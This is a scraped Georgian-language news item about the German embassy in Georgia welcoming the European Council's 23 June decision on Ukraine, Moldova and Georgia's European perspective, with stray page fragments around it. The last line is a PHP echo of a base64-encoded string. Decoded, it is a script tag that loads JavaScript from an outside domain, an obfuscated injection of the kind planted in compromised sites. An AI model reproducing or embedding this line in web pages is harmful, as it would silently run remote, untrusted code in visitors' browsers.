celsiusi
ავერსი საქკაბელი

საქართველოში გერმანიის საელჩო ევროპული საბჭოს გადაწყვეტილებას ეხმაურება და აცხადებს, რომ იციან, ქართული საზოგადეობა მზადაა ყველაფერი გააკეთოს ევროპულ გზაზე წარმატების მისაღწევად.

"მიზანი ნათელია: საქართველო, უკრაინა და მოლდოვა უნდა გახდნენ ევროკავშირის  წევრები. ვიცით, რომ ქართული საზოგადოება მზად არის, ყველაფერი გააკეთოს ამ გზაზე წარმატების მისაღწევად. გერმანია  თავის წვლილს შეიტანს ამ წარმატების უზრუნველსაყოფად. საკუთარი ისტორიის ახალ თავს ევროპა ერთობლივად შექმნის", - აცხადებს საელჩო.

ცნობისთვის, 23 ივნისს ევროპულმა საბჭომ კანდიდატის სტატუსი მიანიჭა უკრაინასა და მოლდოვას, საქართველოს შემთხვევაში კი აღიარა ქვეყნის ევროპული პერსპექტივა.

558
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");